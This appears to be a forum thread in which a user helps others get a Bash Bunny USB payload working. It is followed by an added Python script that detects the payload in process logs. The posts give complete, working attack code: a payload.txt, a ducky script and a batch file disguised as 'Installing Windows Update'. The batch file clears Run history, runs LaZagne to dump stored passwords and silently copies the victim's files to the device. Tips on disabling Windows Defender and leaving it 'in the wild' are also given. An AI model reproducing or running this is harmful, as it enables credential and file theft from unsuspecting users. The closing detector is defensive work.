D31M0Z

  1. Lol impossiblerrr! :) i lolol'd so hard
  2. I don't see how user error can be at fault here so don't worry on that front. The payload/duck script runs flawlessly on mine. Try factory resetting your bunny and retrying.
  3. they are .cmd files not .exe lol
  4. #make a payload.txt containing this
         LED SETUP
         ATTACKMODE HID STORAGE
         GET SWITCH_POSITION
         LED ATTACK
         if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
             QUACK ${SWITCH_POSITION}/ducky_script.txt
             LED FINISH
         else
             LED FAIL
             echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
             exit 1
         fi
     #then make a ducky_script.txt containing this
         DELAY 2000
         GUI r
         DELAY 1000
         STRING notepad.exe
         DELAY 300
         STRING (\___/)
         ENTER
         DELAY 300
         STRING (='.'=)
         ENTER
         DELAY 300
         STRING (")_(")
         DELAY 300
     #put them both in the same switch folder and try it out ;)
     #it's the long way to do it but I like it cause if it fails I get a debug log :)
  5. the only time it doesn't work for me is if i don't let it do its thing long enough. i got to go to work but you can clone my whole switch folder from GitHub. Here's the link ^ if you get errors from that it's probably from premature BB pulling or you have no files with the extension you're xcopying
  6. word, try to replace your whole e.cmd with mine that i attached below, there might be errors somewhere else in your e.cmd. e.cmd
  7. what's your xcopy line look like?
     Example1: (*=wildcard so it searches through all)
         if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.pdf %dst% >>nul)
     Example2: (does Documents folder)
         if Exist %USERPROFILE%\Documents (xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul)
     Example3: (does Desktop folder)
         if Exist %USERPROFILE%\Desktop (xcopy /C /Q /G /Y /S %USERPROFILE%\Desktop\*.pdf %dst% >>nul)
     **all the examples do pdf files**change the .pdf to what file type you want to grab**
     Another question is, do you have any files labeled with the extension you're trying to grab?
  8. Above is a direct copy of my e.cmd, e.cmd is the only file i ever edit on this payload. **try running it and before pulling the bash bunny try to 'eject' it from windows, if windows gives you an error message saying it's busy then xcopy is still running so you need to wait** **BB is fast but you still need to give it time for some payloads, especially exfiltration payloads** **just think about how long it takes you to move pictures or docs into a normal flash drive, the BB does have a great transfer rate though lol**
  9.     @echo off
         @echo Installing Windows Update
         REM Delete registry keys storing Run dialog history
         REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
         REM Creates directory compromised of computer name, date and time
         REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
         REM This executes LaZagne in the current directory and outputs the password file to Loot
         REM Time and Date is also added
         setlocal
         cd /d %~dp0
         %~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"
         REM These lines if you just want Passwords and no files.
         set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
         mkdir %dst% >>nul
         if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.txt %dst% >>nul
         REM /C Continues copying even if errors occur.
         REM /Q Does not display file names while copying.
         REM /G Allows the copying of encrypted files to destination that does not support encryption.
         REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
         REM /E Copies directories and subdirectories, including empty ones.
         REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
         REM Same as above but does not create empty directories
         REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul
         )
         REM Blink CAPSLOCK key
         start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
         @cls
         @exit
  10. the powershell opening then closing is the first line, everything else needs to load so don't prematurely pull the bunny. wait for that caps lock to blink for the okay from the bunny itself. the loot folder should contain a directory labeled with the victim then a txt file containing the LaZagne scan for example if i were to deploy this in the wild i would make sure it can be inserted and left for at least 5-10 min. to make sure the xcopy command finishes and exits so i don't miss anything. doesn't need to be 5-10 min. (only needs to hit the last line where it flashes caps lock) but it gives me a time frame to wait on then come back to it and pull.
  11. the only line i change when coming from a fresh payload copy is:
      the *'s are wildcards so the xcopy will search any directories or names in the user profile containing txt files.
      the /C /Q /G /Y are explained below the xcopy command
      /S makes sure it doesn't grab empty folders
          if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.doc %dst% >>nul
          REM /C Continues copying even if errors occur.
          REM /Q Does not display file names while copying.
          REM /G Allows the copying of encrypted files to destination that does not support encryption.
          REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
          REM /E Copies directories and subdirectories, including empty ones.
          REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
          REM Same as above but does not create empty directories
          REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul
          )
  12. #the link you provided doesn't work since it's a local file not an internet file lol but here is my e.cmd for txt files
          @echo off
          @echo Installing Windows Update
          REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
          setlocal
      #Below uses the laZagne.exe in your switch folder
          cd /d %~dp0
          %~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"
      #Below runs xcopy to grab file specified by location and file extension (the one below grabs simple .txt documents)
      #Try making a txt document on your desktop labeled target.txt then run the payload to see if it grabs it.
          set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
          mkdir %dst% >>nul
          if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.txt %dst% >>nul)
      #the line below spams caps lock to tell you that the payload is done and files are copied (if you have a caps lock led on your keyboard it should blink when the payload finishes.)
          start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
          @cls
          @exit
  13. Configure the xcopy command in e.cmd to whatever you're trying to grab, I also found if I have set up internet share with the bunny it won’t dump files but it still grabs passwords with LaZagne. If you have sharing turned on in your main network card turn it off when testing the payload. laZagne.exe/I.vbs/e.cmd/d.cmd/payload.txt should all be in the same switch (1/2) folder so they can be used together. *Also use notepad++ not notepad cause it works better
  14. Could be windows defender blocking LaZagne from working, was the only thing I found that would give me an empty password.txt if it was active during scan. It also auto deletes hack tools or quarantines them automatically when active so I always shut it off before arming my bunny.
  15. The *'s are 'wildcards' you can replace them with desired target names or change the file extension (.doc) to any desired.
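
Seen from the defending side, the e.cmd quoted in the posts above leaves a recognisable sequence in process-creation logs: the RunMRU registry delete, the LaZagne run, the quiet recursive xcopy and the hidden PowerShell CAPSLOCK SendKeys. The following is an added example, not part of the original posts, that correlates those command lines per host; the log format, host names, paths, rule names and thresholds are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Behaviours taken from the e.cmd quoted in the posts; rule names are made up for this example.
RULES = {
    "runmru_wipe": re.compile(r"\breg(\.exe)?\s+delete\s+\S*\\Explorer\\RunMRU\b", re.I),
    "lazagne_run": re.compile(r"\blazagne\.exe\b", re.I),
    # xcopy that continues on errors (/C), hides file names (/Q) and never prompts (/Y)
    "quiet_xcopy": re.compile(r"\bxcopy(\.exe)?\b(?=.*\s/C\b)(?=.*\s/Q\b)(?=.*\s/Y\b)", re.I),
    "sendkeys_capslock": re.compile(
        r"powershell.*-WindowStyle\s+Hidden.*SendKeys\('\{CAPSLOCK\}'\)", re.I),
}

# Constructed process-creation records (time | host | command line); not real telemetry.
SAMPLE_LOG = r"""
2024-05-01T10:00:01 | WS-01 | REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
2024-05-01T10:00:02 | WS-01 | E:\payloads\switch1\laZagne.exe all
2024-05-01T10:00:05 | WS-01 | xcopy /C /Q /G /Y /S C:\Users\alice\*\*.txt E:\loot\USB_Exfiltration\WS-01_20240501_100005
2024-05-01T10:03:40 | WS-01 | powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}')"
2024-05-01T11:15:00 | WS-02 | xcopy /C /Q /Y /S C:\build\out D:\backup
2024-05-01T12:00:00 | WS-03 | reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
"""

def detect(log_text, window=timedelta(minutes=10), threshold=2):
    """Return {host: [rule names]} for hosts where `threshold` or more distinct
    rules fire inside one `window`; a single hit alone is treated as noise."""
    hits = {}
    for line in log_text.strip().splitlines():
        stamp, host, cmd = (part.strip() for part in line.split("|", 2))
        when = datetime.fromisoformat(stamp)
        for name, rx in RULES.items():
            if rx.search(cmd):
                hits.setdefault(host, []).append((when, name))
    alerts = {}
    for host, events in hits.items():
        events.sort()
        for start, _ in events:
            # Distinct rules that fired within `window` of this event
            seen = {n for t, n in events if start <= t <= start + window}
            if len(seen) >= threshold:
                alerts[host] = sorted(seen)
                break
    return alerts

if __name__ == "__main__":
    for host, rules in detect(SAMPLE_LOG).items():
        print(f"ALERT {host}: {', '.join(rules)}")
```

The 10-minute default window mirrors the 5-10 minute run time mentioned in the posts; a lone quiet xcopy (WS-02) or a lone RunMRU delete (WS-03) stays below the threshold.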